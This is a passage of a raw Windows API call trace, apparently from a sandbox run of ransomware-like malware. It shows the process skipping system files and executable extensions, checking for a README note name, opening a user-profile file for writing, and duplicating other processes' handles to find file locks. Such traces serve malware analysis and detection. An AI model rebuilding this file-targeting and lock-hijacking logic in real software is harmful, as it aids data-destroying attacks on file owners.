cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0153.386] _wcsicmp (_Str1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", _Str2="README.c06622a1.TXT") returned -4 [0153.386] wcsstr (_Str="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", _SubStr="README") returned 0x0 [0153.386] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.386] wcslen (_String="autorun.inf") returned 0xb [0153.386] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0153.386] wcslen (_String="boot.ini") returned 0x8 [0153.386] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0153.386] wcslen (_String="bootfont.bin") returned 0xc [0153.386] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0153.386] wcslen (_String="bootsect.bak") returned 0xc [0153.386] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0153.386] wcslen (_String="desktop.ini") returned 0xb [0153.386] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.386] wcslen (_String="iconcache.db") returned 0xc [0153.386] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.386] wcslen (_String="ntldr") returned 0x5 [0153.386] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -123 [0153.386] wcslen (_String="ntuser.dat") returned 0xa [0153.386] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -77 [0153.386] wcslen (_String="ntuser.dat.log") returned 0xe [0153.386] _wcsicmp (_Str1="ntuser.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.386] wcslen (_String="ntuser.ini") returned 0xa [0153.386] _wcsicmp (_Str1="thumbs.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.386] wcslen (_String="thumbs.db") returned 0x9 [0153.386] _wcsicmp (_Str1="386", _Str2="regtrans-ms") returned -63 [0153.386] wcslen (_String="386") returned 0x3 [0153.386] _wcsicmp (_Str1="adv", _Str2="regtrans-ms") returned -17 [0153.386] wcslen (_String="adv") returned 0x3 [0153.386] _wcsicmp (_Str1="ani", _Str2="regtrans-ms") returned -17 [0153.386] wcslen (_String="ani") returned 0x3 [0153.386] _wcsicmp (_Str1="bat", _Str2="regtrans-ms") returned -16 [0153.387] wcslen (_String="bat") returned 0x3 [0153.387] _wcsicmp (_Str1="bin", _Str2="regtrans-ms") returned -16 [0153.387] wcslen (_String="bin") returned 0x3 [0153.387] _wcsicmp (_Str1="cab", _Str2="regtrans-ms") returned -15 [0153.387] wcslen (_String="cab") returned 0x3 [0153.387] _wcsicmp (_Str1="cmd", _Str2="regtrans-ms") returned -15 [0153.387] wcslen (_String="cmd") returned 0x3 [0153.387] _wcsicmp (_Str1="com", _Str2="regtrans-ms") returned -15 [0153.387] wcslen (_String="com") returned 0x3 [0153.387] _wcsicmp (_Str1="cpl", _Str2="regtrans-ms") returned -15 [0153.387] wcslen (_String="cpl") returned 0x3 [0153.387] _wcsicmp (_Str1="cur", _Str2="regtrans-ms") returned -15 [0153.387] wcslen (_String="cur") returned 0x3 [0153.387] _wcsicmp (_Str1="deskthemepack", _Str2="regtrans-ms") returned -14 [0153.387] wcslen (_String="deskthemepack") returned 0xd [0153.387] _wcsicmp (_Str1="diagcab", _Str2="regtrans-ms") returned -14 [0153.387] wcslen (_String="diagcab") returned 0x7 [0153.387] _wcsicmp (_Str1="diagcfg", _Str2="regtrans-ms") returned -14 [0153.387] wcslen (_String="diagcfg") returned 0x7 [0153.387] _wcsicmp (_Str1="diagpkg", _Str2="regtrans-ms") returned -14 [0153.387] wcslen (_String="diagpkg") returned 0x7 [0153.387] _wcsicmp (_Str1="dll", _Str2="regtrans-ms") returned -14 [0153.387] wcslen (_String="dll") returned 0x3 [0153.387] _wcsicmp (_Str1="drv", _Str2="regtrans-ms") returned -14 [0153.387] wcslen (_String="drv") returned 0x3 [0153.387] _wcsicmp (_Str1="exe", _Str2="regtrans-ms") returned -13 [0153.387] wcslen (_String="exe") returned 0x3 [0153.387] _wcsicmp (_Str1="hlp", _Str2="regtrans-ms") returned -10 [0153.387] wcslen (_String="hlp") returned 0x3 [0153.387] _wcsicmp (_Str1="icl", _Str2="regtrans-ms") returned -9 [0153.387] wcslen (_String="icl") returned 0x3 [0153.387] _wcsicmp (_Str1="icns", _Str2="regtrans-ms") returned -9 [0153.387] wcslen (_String="icns") returned 0x4 [0153.387] _wcsicmp (_Str1="ico", _Str2="regtrans-ms") returned -9 [0153.387] wcslen (_String="ico") returned 0x3 [0153.387] _wcsicmp (_Str1="ics", _Str2="regtrans-ms") returned -9 [0153.387] wcslen (_String="ics") returned 0x3 [0153.387] _wcsicmp (_Str1="idx", _Str2="regtrans-ms") returned -9 [0153.388] wcslen (_String="idx") returned 0x3 [0153.388] _wcsicmp (_Str1="ldf", _Str2="regtrans-ms") returned -6 [0153.388] wcslen (_String="ldf") returned 0x3 [0153.388] _wcsicmp (_Str1="lnk", _Str2="regtrans-ms") returned -6 [0153.388] wcslen (_String="lnk") returned 0x3 [0153.388] _wcsicmp (_Str1="mod", _Str2="regtrans-ms") returned -5 [0153.388] wcslen (_String="mod") returned 0x3 [0153.388] _wcsicmp (_Str1="mpa", _Str2="regtrans-ms") returned -5 [0153.388] wcslen (_String="mpa") returned 0x3 [0153.388] _wcsicmp (_Str1="msc", _Str2="regtrans-ms") returned -5 [0153.388] wcslen (_String="msc") returned 0x3 [0153.388] _wcsicmp (_Str1="msp", _Str2="regtrans-ms") returned -5 [0153.388] wcslen (_String="msp") returned 0x3 [0153.388] _wcsicmp (_Str1="msstyles", _Str2="regtrans-ms") returned -5 [0153.388] wcslen (_String="msstyles") returned 0x8 [0153.388] _wcsicmp (_Str1="msu", _Str2="regtrans-ms") returned -5 [0153.388] wcslen (_String="msu") returned 0x3 [0153.388] _wcsicmp (_Str1="nls", _Str2="regtrans-ms") returned -4 [0153.388] wcslen (_String="nls") returned 0x3 [0153.388] _wcsicmp (_Str1="nomedia", _Str2="regtrans-ms") returned -4 [0153.388] wcslen (_String="nomedia") returned 0x7 [0153.388] _wcsicmp (_Str1="ocx", _Str2="regtrans-ms") returned -3 [0153.388] wcslen (_String="ocx") returned 0x3 [0153.388] _wcsicmp (_Str1="prf", _Str2="regtrans-ms") returned -2 [0153.388] wcslen (_String="prf") returned 0x3 [0153.388] _wcsicmp (_Str1="ps1", _Str2="regtrans-ms") returned -2 [0153.388] wcslen (_String="ps1") returned 0x3 [0153.388] _wcsicmp (_Str1="rom", _Str2="regtrans-ms") returned 10 [0153.388] wcslen (_String="rom") returned 0x3 [0153.388] _wcsicmp (_Str1="rtp", _Str2="regtrans-ms") returned 15 [0153.388] wcslen (_String="rtp") returned 0x3 [0153.388] _wcsicmp (_Str1="scr", _Str2="regtrans-ms") returned 1 [0153.388] wcslen (_String="scr") returned 0x3 [0153.388] _wcsicmp (_Str1="shs", _Str2="regtrans-ms") returned 1 [0153.388] wcslen (_String="shs") returned 0x3 [0153.388] _wcsicmp (_Str1="spl", _Str2="regtrans-ms") returned 1 [0153.389] wcslen (_String="spl") returned 0x3 [0153.389] _wcsicmp (_Str1="sys", _Str2="regtrans-ms") returned 1 [0153.389] wcslen (_String="sys") returned 0x3 [0153.389] _wcsicmp (_Str1="theme", _Str2="regtrans-ms") returned 2 [0153.389] wcslen (_String="theme") returned 0x5 [0153.389] _wcsicmp (_Str1="themepack", _Str2="regtrans-ms") returned 2 [0153.389] wcslen (_String="themepack") returned 0x9 [0153.389] _wcsicmp (_Str1="wpx", _Str2="regtrans-ms") returned 5 [0153.389] wcslen (_String="wpx") returned 0x3 [0153.389] _wcsicmp (_Str1="lock", _Str2="regtrans-ms") returned -6 [0153.389] wcslen (_String="lock") returned 0x4 [0153.389] _wcsicmp (_Str1="key", _Str2="regtrans-ms") returned -7 [0153.389] wcslen (_String="key") returned 0x3 [0153.389] _wcsicmp (_Str1="hta", _Str2="regtrans-ms") returned -10 [0153.389] wcslen (_String="hta") returned 0x3 [0153.389] _wcsicmp (_Str1="msi", _Str2="regtrans-ms") returned -5 [0153.389] wcslen (_String="msi") returned 0x3 [0153.389] _wcsicmp (_Str1="pdb", _Str2="regtrans-ms") returned -2 [0153.389] wcslen (_String="pdb") returned 0x3 [0153.389] _wcsicmp (_Str1="sql", _Str2="regtrans-ms") returned 1 [0153.389] wcslen (_String="sql") returned 0x3 [0153.389] _wcsicmp (_Str1="sqlite", _Str2="regtrans-ms") returned 1 [0153.389] wcslen (_String="sqlite") returned 0x6 [0153.389] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0153.389] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0153.389] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0153.389] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0153.389] wcscpy (in: _Dest=0x44a00a4, _Source="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: _Dest="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0153.389] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 1 [0153.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.390] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0153.390] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0153.390] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fed80 | out: SystemInformation=0x4e4170, ResultLength=0x3fed80*=0x28034) returned 0xc0000004 [0153.391] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x28034) returned 0x44b0068 [0153.391] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x28034, ResultLength=0x3fed80 | out: SystemInformation=0x44b0068, ResultLength=0x3fed80*=0x28034) returned 0x0 [0153.395] GetCurrentProcessId () returned 0x6fc [0153.395] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0153.395] CloseHandle (hObject=0x62c) returned 1 [0153.395] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0153.395] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fedc0 | out: SystemInformation=0x4e4170, ResultLength=0x3fedc0*=0x28024) returned 0xc0000004 [0153.395] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x28024) returned 0x44b0068 [0153.395] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x28024, ResultLength=0x3fedc0 | out: SystemInformation=0x44b0068, ResultLength=0x3fedc0*=0x28024) returned 0x0 [0153.398] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x10000) returned 0x44d8098 [0153.398] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.398] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.399] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.399] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.400] CloseHandle (hObject=0x670) returned 1 [0153.400] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.400] CloseHandle (hObject=0x680) returned 1 [0153.400] CloseHandle (hObject=0x62c) returned 1 [0153.400] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.400] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.401] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.405] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.405] CloseHandle (hObject=0x670) returned 1 [0153.405] CloseHandle (hObject=0x680) returned 1 [0153.405] CloseHandle (hObject=0x62c) returned 1 [0153.405] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.405] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.406] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.406] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.407] CloseHandle (hObject=0x670) returned 1 [0153.407] CloseHandle (hObject=0x680) returned 1 [0153.407] CloseHandle (hObject=0x62c) returned 1 [0153.407] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.407] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.408] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.408] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.408] CloseHandle (hObject=0x670) returned 1 [0153.409] CloseHandle (hObject=0x680) returned 1 [0153.409] CloseHandle (hObject=0x62c) returned 1 [0153.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.409] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.409] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.410] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.410] CloseHandle (hObject=0x670) returned 1 [0153.410] CloseHandle (hObject=0x680) returned 1 [0153.410] CloseHandle (hObject=0x62c) returned 1 [0153.410] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.410] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.411] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.412] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.412] CloseHandle (hObject=0x670) returned 1 [0153.412] CloseHandle (hObject=0x680) returned 1 [0153.412] CloseHandle (hObject=0x62c) returned 1 [0153.412] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.412] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.412] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.413] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.413] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.413] CloseHandle (hObject=0x670) returned 1 [0153.413] CloseHandle (hObject=0x680) returned 1 [0153.413] CloseHandle (hObject=0x62c) returned 1 [0153.413] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.414] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.414] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.415] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.415] CloseHandle (hObject=0x670) returned 1 [0153.415] CloseHandle (hObject=0x680) returned 1 [0153.415] CloseHandle (hObject=0x62c) returned 1 [0153.415] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0153.415] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.416] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.416] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.417] CloseHandle (hObject=0x670) returned 1 [0153.417] CloseHandle (hObject=0x680) returned 1 [0153.417] CloseHandle (hObject=0x62c) returned 1 [0153.417] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0153.417] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.417] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.418] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.418] CloseHandle (hObject=0x670) returned 1 [0153.418] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.418] CloseHandle (hObject=0x680) returned 1 [0153.418] CloseHandle (hObject=0x62c) returned 1 [0153.418] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0153.418] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.419] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.419] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.420] CloseHandle (hObject=0x670) returned 1 [0153.420] CloseHandle (hObject=0x680) returned 1 [0153.420] CloseHandle (hObject=0x62c) returned 1 [0153.420] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.420] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.420] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.421] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.421] CloseHandle (hObject=0x670) returned 1 [0153.421] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.421] CloseHandle (hObject=0x680) returned 1 [0153.421] CloseHandle (hObject=0x62c) returned 1 [0153.421] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.421] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.422] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.423] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.423] CloseHandle (hObject=0x670) returned 1 [0153.423] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.423] CloseHandle (hObject=0x680) returned 1 [0153.423] CloseHandle (hObject=0x62c) returned 1 [0153.423] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.423] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.424] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.424] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.424] CloseHandle (hObject=0x670) returned 1 [0153.424] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.425] CloseHandle (hObject=0x680) returned 1 [0153.425] CloseHandle (hObject=0x62c) returned 1 [0153.425] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.425] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.426] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.426] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.426] CloseHandle (hObject=0x670) returned 1 [0153.426] _wcsicmp (_Str1="\\InitShutdown", 